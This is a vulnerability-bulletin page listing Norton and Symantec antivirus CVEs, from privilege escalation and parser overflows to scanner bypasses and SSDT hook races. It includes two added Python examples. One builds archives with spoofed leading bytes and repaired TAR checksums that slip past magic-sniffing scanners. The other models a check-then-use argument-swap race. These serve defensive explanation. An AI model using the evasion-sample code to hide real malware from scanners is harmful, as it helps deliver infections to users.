The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Norton Antivirus

computer threat CVE-2017-5565 CVE-2017-5566 CVE-2017-5567

Antivirus: privilege escalation via Microsoft Application Verifier

Synthesis of the vulnerability

An attacker can abuse Microsoft Application Verifier to bypass the restrictions of the Antivirus, in order to escalate his privileges.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 5.
Creation date: 22/03/2017.
Identifiers: 1116957, CVE-2017-5565, CVE-2017-5566, CVE-2017-5567, CVE-2017-6186, CVE-2017-6417, VIGILANCE-VUL-22211.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

An attacker can abuse Microsoft Application Verifier to bypass the restrictions of the Antivirus, in order to escalate his privileges.

cybersecurity note CVE-2016-6592

Norton: code execution via the "Download Manager"

Synthesis of the vulnerability

An attacker can exploit a vulnerability in the Norton Download Manager, in order to run code.
Severity: 2/4.
Creation date: 18/01/2017.
Identifiers: CVE-2016-6592, SYM17-001, VIGILANCE-VUL-21619.

Description of the vulnerability

An attacker can exploit a vulnerability in the Norton Download Manager, in order to run code. The error is of the kind described in VIGILANCE-VUL-18671.

computer weakness note CVE-2016-5311

Norton, Symantec Endpoint Protection: privilege escalation via DLL Pre-loading

Synthesis of the vulnerability

An attacker can bypass restrictions via DLL pre-loading in Norton or Symantec Endpoint Protection, in order to escalate his privileges.
Severity: 2/4.
Creation date: 18/11/2016.
Identifiers: CVE-2016-5311, SYM16-021, VIGILANCE-VUL-21156.

Description of the vulnerability

An attacker can bypass restrictions via DLL pre-loading in Norton or Symantec Endpoint Protection, in order to escalate his privileges.

security alert CVE-2016-2207 CVE-2016-2209 CVE-2016-2210

Symantec: seven vulnerabilities of the "Decomposer" module

Synthesis of the vulnerability

An attacker can use several vulnerabilities of Symantec products.
Severity: 4/4.
Number of vulnerabilities in this bulletin: 7.
Creation date: 29/06/2016.
Revision date: 29/06/2016.
Identifiers: 810, 814, 816, 818, 819, 821, 823, CERTFR-2016-AVI-222, CVE-2016-2207, CVE-2016-2209, CVE-2016-2210, CVE-2016-2211, CVE-2016-3644, CVE-2016-3645, CVE-2016-3646, VIGILANCE-VUL-19997.

Description of the vulnerability

Several vulnerabilities were announced in Symantec Endpoint Protection.

An attacker can generate a buffer overflow via a substream of MS-Office file, in order to trigger a denial of service, and possibly to run code. [severity:4/4; 823, CVE-2016-2209]

An attacker can force a read at an invalid address via ALPkOldFormatDecompressor::UnShrink, in order to trigger a denial of service, or to obtain sensitive information. [severity:2/4; 821, CVE-2016-3646]

An attacker can generate an integer overflow via Attachment::setDataFromAttachment, in order to trigger a denial of service, and possibly to run code. [severity:2/4; 819, CVE-2016-3645]

An attacker can generate a buffer overflow via CMIMEParser::UpdateHeader, in order to trigger a denial of service, and possibly to run code. [severity:3/4; 818, CVE-2016-3644]

An attacker can generate a memory corruption via a MSPACK archive, in order to trigger a denial of service, and possibly to run code. [severity:3/4; 816, CVE-2016-2211]

An attacker can generate a buffer overflow via CSymLHA::get_header, in order to trigger a denial of service, and possibly to run code. [severity:4/4; 814, CVE-2016-2210]

An attacker can generate a memory corruption via a RAR archive, in order to trigger a denial of service, and possibly to run code. [severity:3/4; 810, CVE-2016-2207]

threat note CVE-2016-2208

Symantec AVE: memory corruption via PE Header

Synthesis of the vulnerability

An attacker can generate a memory corruption via a PE Header on Symantec AVE, in order to trigger a denial of service, and possibly to run code with system privileges.
Severity: 4/4.
Creation date: 17/05/2016.
Identifiers: 820, BID-90653, CVE-2016-2208, SYM16-008, VIGILANCE-VUL-19636.

Description of the vulnerability

The Symantec AVE engine analyzes executables in PE format.

However, a malformed PE header corrupts the memory of a kernel driver.

An attacker can therefore generate a memory corruption via a PE Header on Symantec AVE, in order to trigger a denial of service, and possibly to run code with system privileges.

threat CVE-2012-1421 CVE-2012-1425 CVE-2012-1443

Symantec Antivirus: bypassing via CAB, CHM, ELF, EXE, Office, RAR, TAR, ZIP

Synthesis of the vulnerability

An attacker can create an archive or a program containing a virus, which is not detected by Symantec Antivirus.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 9.
Creation date: 21/03/2012.
Identifiers: BID-52575, BID-52580, BID-52600, BID-52608, BID-52610, BID-52612, BID-52613, BID-52623, BID-52626, CVE-2012-1421, CVE-2012-1425, CVE-2012-1443, CVE-2012-1446, CVE-2012-1456, CVE-2012-1457, CVE-2012-1459, CVE-2012-1461, CVE-2012-1462, VIGILANCE-VUL-11472.

Description of the vulnerability

Archive extraction tools (TAR, ZIP, etc.) will extract archives that are slightly malformed, and systems will execute programs (ELF) that are slightly malformed. However, Symantec Antivirus does not detect viruses contained in these archives/programs, because its own parsers reject or misidentify the malformed container before reaching the content.

A TAR archive containing "MSCF" as its first 4 bytes bypasses the detection. [severity:1/4; BID-52575, CVE-2012-1421]

A TAR archive containing "\50\4B\03\04" as its first 4 bytes bypasses the detection. [severity:1/4; BID-52580, CVE-2012-1425]

A RAR archive containing "MZ" as its first 2 bytes bypasses the detection. [severity:1/4; BID-52612, CVE-2012-1443]

An ELF program containing a large "encoding" field bypasses the detection. [severity:2/4; BID-52600, CVE-2012-1446]

A ZIP archive starting with TAR data bypasses the detection. [severity:1/4; BID-52608, CVE-2012-1456]

A TAR archive with a large size bypasses the detection. [severity:1/4; BID-52610, CVE-2012-1457]

A TAR archive with a header containing a large value bypasses the detection. [severity:1/4; BID-52623, CVE-2012-1459]

A TAR+GZ archive containing two streams bypasses the detection. [severity:1/4; BID-52626, CVE-2012-1461]

A ZIP archive starting with 1024 random bytes bypasses the detection. [severity:1/4; BID-52613, CVE-2012-1462]

An attacker can therefore create an archive containing a virus which is not detected by the antivirus, but which is extracted by extraction tools. The virus is then only detected once it has been extracted on the victim's computer. An attacker can also create a program containing a virus which is not detected by the antivirus, but which can still be run by the system.
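
The bypass class above (a container whose leading bytes claim one format, or claim nothing at all, while the tools on the endpoint still extract it as another) as an added example, not code from the bulletin or from Symantec. It builds four constructed samples with Python's own tarfile and zipfile modules, covering the "MSCF" and "PK\x03\x04" TAR cases, the ZIP with a 1024-byte prefix, and the ZIP that starts with TAR data. A scanner that dispatches on the sniffed magic never reaches the payload, while one that tries every extractor the endpoint has does. The payload, file names, and the filler prefix are constructed stand-ins; the checksum repair in spoof_tar_leading_bytes is what makes the spoofed TAR acceptable to real tar tools.

```python
import io
import tarfile
import zipfile

# Constructed stand-in for content the scanner is supposed to flag (not malware).
PAYLOAD = b"constructed-suspicious-payload\n"

# Offset-0 magics a naive dispatcher keys on; the ustar tag at offset 257 comes last.
MAGICS = [(b"MSCF", "cab"), (b"PK\x03\x04", "zip"), (b"Rar!\x1a\x07", "rar"),
          (b"\x7fELF", "elf"), (b"MZ", "pe")]

# Constructed 1024-byte filler that matches no known magic (deterministic
# stand-in for the "random bytes" prefix of the ZIP case).
JUNK = bytes((i * 37 + 11) & 0xFF for i in range(1024))


def sniff_magic(data: bytes) -> str:
    """Type detection that trusts the leading bytes before anything else."""
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return kind
    if data[257:262] == b"ustar":
        return "tar"
    return "unknown"


def build_tar(name: str, payload: bytes) -> bytes:
    """Uncompressed tar with one regular file, built in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo(name)
        info.size = len(payload)
        tf.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def tar_checksum(header: bytes) -> int:
    """ustar checksum: all 512 header bytes, with the 8-byte chksum field
    at offset 148 counted as ASCII spaces."""
    return sum(header[:148]) + 8 * 0x20 + sum(header[156:512])


def spoof_tar_leading_bytes(tar: bytes, magic: bytes) -> bytes:
    """Overwrite the start of the first header (the name field) with another
    format's magic, then repair the checksum so tar tools still accept it."""
    hdr = bytearray(tar[:512])
    hdr[:len(magic)] = magic
    hdr[148:156] = b"%06o\0 " % tar_checksum(bytes(hdr))
    return bytes(hdr) + tar[512:]


def build_zip(name: str, payload: bytes) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def tar_members(data: bytes) -> dict:
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        return {m.name: tf.extractfile(m).read() for m in tf if m.isfile()}


def zip_members(data: bytes) -> dict:
    # zipfile locates the end-of-central-directory record from the end of the
    # file, so leading junk (or a whole tar archive) is silently tolerated.
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {n: zf.read(n) for n in zf.namelist()}


def naive_scan(data: bytes) -> dict:
    """Scanner that only runs the parser chosen by sniff_magic(); returns the
    member files it would actually get to inspect."""
    kind = sniff_magic(data)
    try:
        if kind == "tar":
            return tar_members(data)
        if kind == "zip":
            return zip_members(data)
    except (tarfile.TarError, zipfile.BadZipFile):
        pass
    return {}  # cab/rar/pe/elf/unknown: no archive parser ran at all


def robust_scan(data: bytes) -> dict:
    """Scanner that tries every extractor the endpoint itself would use,
    regardless of what the leading bytes claim."""
    found = {}
    for extract in (tar_members, zip_members):
        try:
            found.update(extract(data))
        except (tarfile.TarError, zipfile.BadZipFile):
            continue
    return found


def samples() -> dict:
    plain = build_tar("payload.txt", PAYLOAD)
    return {
        "tar-as-cab": spoof_tar_leading_bytes(plain, b"MSCF"),
        "tar-as-zip": spoof_tar_leading_bytes(plain, b"PK\x03\x04"),
        "zip-junk-prefix": JUNK + build_zip("payload.txt", PAYLOAD),
        "zip-after-tar": build_tar("benign.txt", b"hello\n")
                         + build_zip("payload.txt", PAYLOAD),
    }


if __name__ == "__main__":
    for label, blob in samples().items():
        print(f"{label:16} sniff={sniff_magic(blob):8} "
              f"naive={sorted(naive_scan(blob))} robust={sorted(robust_scan(blob))}")
```

The practical check this encodes: an engine must not let a magic-number dispatcher decide which single parser runs; it has to attempt every container format the endpoint's own tools would accept, and treat a parser failure on data that another parser accepts as suspicious rather than as "clean".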

computer threat alert CVE-2010-5151 CVE-2010-5152 CVE-2010-5154

Antivirus: bypassing SSDT Hooking

Synthesis of the vulnerability

When an antivirus redirects the SSDT to detect viruses, a local attacker can use an atomicity error, in order to bypass this protection.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 13.
Creation date: 10/05/2010.
Revision date: 11/05/2010.
Identifiers: CVE-2010-5151, CVE-2010-5152, CVE-2010-5154, CVE-2010-5156, CVE-2010-5161, CVE-2010-5163, CVE-2010-5166, CVE-2010-5167, CVE-2010-5168, CVE-2010-5171, CVE-2010-5172, CVE-2010-5177, CVE-2010-5179, VIGILANCE-VUL-9633.

Description of the vulnerability

The SSDT (System Service Descriptor Table) contains references to the kernel's system call handlers:
 - NtCreateKey : create a key in the registry
 - NtCreateThread : create a thread
 - NtDeleteFile : delete a file
 - etc.

Antiviruses redirect entries of this table to verification functions. Several implementations check the parameters, and then call the original system call. However, the parameters are read from the calling process's memory, and between these two operations a local attacker can change them. An attacker can therefore create a program that passes legitimate parameters to the check, and then changes them (for instance from a second thread) just before the original system call reads them again. This is a time-of-check to time-of-use race: the value that was validated is not the value that is used.

When an antivirus redirects the SSDT to detect viruses, a local attacker can therefore use an atomicity error, in order to bypass this protection.
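
The check-then-call race described above, as an added example that is not from the bulletin or from any vendor's driver: a user-mode Python model in which a hooked NtDeleteFile reads its path argument from a buffer the calling process still controls, while a second thread rewrites that buffer in the window between the hook's check and the original service's use. Paths, function names, and the explicit scheduling window (two events instead of relying on the host scheduler) are constructed for the illustration; the double-fetch version is the vulnerable pattern, the single-fetch version validates and forwards one captured copy.

```python
import threading

# Constructed paths: the file the hook must protect and a harmless decoy.
PROTECTED = "C:\\Program Files\\AV\\av.sys"
HARMLESS = "C:\\Temp\\harmless.txt"


class UserMemory:
    """Models a user-mode buffer that the kernel-mode hook reads through a
    pointer; any thread of the calling process can rewrite it at any time."""

    def __init__(self, text: str):
        self.buf = bytearray(text.encode("utf-16-le"))

    def read(self) -> str:
        return self.buf.decode("utf-16-le")

    def write(self, text: str) -> None:
        self.buf[:] = text.encode("utf-16-le")


def original_nt_delete_file(path: str) -> str:
    """Stand-in for the NtDeleteFile entry the SSDT pointed to before hooking."""
    return "deleted " + path


def hook_double_fetch(user_mem: UserMemory, preempt) -> str:
    """Vulnerable hook: validates the argument in user memory, then lets the
    original service fetch it again from the same user memory."""
    if user_mem.read() == PROTECTED:                  # fetch 1: the check
        return "blocked"
    preempt()                                         # scheduler window
    return original_nt_delete_file(user_mem.read())   # fetch 2: the use


def hook_single_fetch(user_mem: UserMemory, preempt) -> str:
    """Hardened hook: copies the argument once into memory the caller cannot
    reach, validates the copy, and forwards that same copy."""
    path = user_mem.read()                            # captured once
    if path == PROTECTED:
        return "blocked"
    preempt()
    return original_nt_delete_file(path)              # uses the checked value


def race(hook) -> str:
    """Run `hook` against an attacker thread that rewrites the argument in the
    window between check and use. Events pin the interleaving so the result
    does not depend on the host scheduler."""
    mem = UserMemory(HARMLESS)
    window_open, window_done = threading.Event(), threading.Event()

    def attacker():
        window_open.wait()
        mem.write(PROTECTED)      # swap the argument after validation passed
        window_done.set()

    def preempt():
        window_open.set()
        window_done.wait()

    t = threading.Thread(target=attacker)
    t.start()
    result = hook(mem, preempt)
    t.join()
    return result


if __name__ == "__main__":
    print("double fetch:", race(hook_double_fetch))   # protected file is deleted
    print("single fetch:", race(hook_single_fetch))   # only the harmless path is used
```

The single-fetch version only models the fix. In a real SSDT hook the original NtXxx service reads its arguments from the pointer it is handed, and when the call originated in user mode it probes that pointer and rejects kernel addresses, so the hook cannot simply pass it a kernel-side copy. That is part of why argument-swapping attacks against SSDT hooks were so broadly effective, and why the supported Windows interfaces (file system minifilters, registry and object callbacks) are the sound way to get this kind of interposition.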

security vulnerability CVE-2010-0106 CVE-2010-0107 CVE-2010-0108

Symantec AV, Norton AV: several vulnerabilities

Synthesis of the vulnerability

Three vulnerabilities of Symantec and Norton products can be used by an attacker to disable the antivirus or to execute code.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 3.
Creation date: 18/02/2010.
Identifiers: BID-38127, BID-38129, BID-38222, CERTA-2010-AVI-087, CVE-2010-0106, CVE-2010-0107, CVE-2010-0108, DSECRG-09-039, SYM10-002, SYM10-003, SYM10-004, VIGILANCE-VUL-9462.

Description of the vulnerability

Three vulnerabilities were announced in Symantec and Norton products.

A local attacker can disable the Symantec AntiVirus on-demand scan. [severity:2/4; BID-38127, CERTA-2010-AVI-087, CVE-2010-0106, SYM10-002]

An attacker can generate a buffer overflow in the SYMLTCOM.DLL ActiveX control of Norton AV/IS, in order to execute code when the victim browses a malicious web site. [severity:2/4; BID-38129, CVE-2010-0107, SYM10-003]

An attacker can generate a buffer overflow in Symantec Client Proxy (CLIproxy.dll). [severity:1/4; BID-38222, CVE-2010-0108, DSECRG-09-039, SYM10-004]

cybersecurity threat CVE-2009-1348

F-Secure, McAfee, Symantec: bypassing via PDF

Synthesis of the vulnerability

An attacker can create a malicious PDF document which is not detected by F-Secure, McAfee and Symantec products.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 3.
Creation date: 28/10/2009.
Identifiers: BID-36848, BID-36876, CERTA-2009-AVI-172, CVE-2009-1348, FSC-2009-3, G-SEC 47-2009, G-SEC 48-2009, G-SEC 49-2009, SB10003, VIGILANCE-VUL-9133.

Description of the vulnerability

A PDF document can be specially constructed so that Adobe Reader still opens it, but antivirus software does not recognize it as a PDF and therefore does not inspect its content. An attacker can create such a document, and thus bypass the products of three vendors.

A malicious PDF document is not detected by Symantec and Norton products. [severity:2/4; G-SEC 47-2009]

A malicious PDF document is not detected by F-Secure products. [severity:2/4; BID-36876, FSC-2009-3, G-SEC 48-2009]

A malicious PDF document is not detected by McAfee products. A malicious TAR archive is also not detected by McAfee products. [severity:2/4; BID-36848, CERTA-2009-AVI-172, CVE-2009-1348, G-SEC 49-2009, SB10003]

An attacker can therefore create a malicious PDF document which is not detected by F-Secure, McAfee and Symantec products.

computer weakness alert CVE-2009-3104

Symantec, Norton AV: denial of service

Synthesis of the vulnerability

An attacker can send a malicious email, in order to prevent the victim from reading his other emails.
Severity: 1/4.
Creation date: 28/08/2009.
Identifiers: BID-34670, CVE-2009-3104, SYM09-012, VIGILANCE-VUL-8982.

Description of the vulnerability

The Norton AntiVirus, Norton Internet Security, Symantec AntiVirus Corporate Edition and Symantec Client Security products use the Internet Email Scanning feature to scan emails when they are downloaded from the mail server.

However, a malicious email triggers an infinite loop in the scanning engine, which interrupts the session with the mail server. The victim then cannot download his emails.

An attacker can therefore send a malicious email, in order to prevent the victim from reading his other emails.